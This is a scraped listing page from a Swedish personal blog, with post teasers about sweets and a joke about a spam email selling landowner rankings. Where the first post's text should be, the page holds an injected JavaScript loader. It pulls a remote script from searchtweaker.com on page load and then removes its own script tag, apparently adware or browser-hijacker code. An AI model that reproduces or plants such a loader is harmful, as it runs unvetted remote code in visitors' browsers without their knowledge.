Read More
Livet hos Hogengård

Ge mig gooodis!

(function(){try{var header=document.getElementsByTagName("HEAD");var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Read more

Read More
Livet hos Hogengård

Höjden av nyfikenhet?!

" I LantbruksFakta´s förteckning över markägare hittar du svaret på:Vilka äger mest mark i din kommun / LänVilka får mest EU-stöd i din kommun / LänHur många hektar åker/skog äger man egentligen Vad tjänar egentligen ägarna av jord- och skogsbruksmarkGå till: www.lantbruksfakta.se för mer information och beställning Nu även med rankinglistor över ägare med störst areal, störst värden etc. inom varje kommun."Fick jag i min mail idag. Oerhört komiskt. Kan tänka mig att det är många gobbar som sitter och lusläser den ute i stugorna. :D

Read more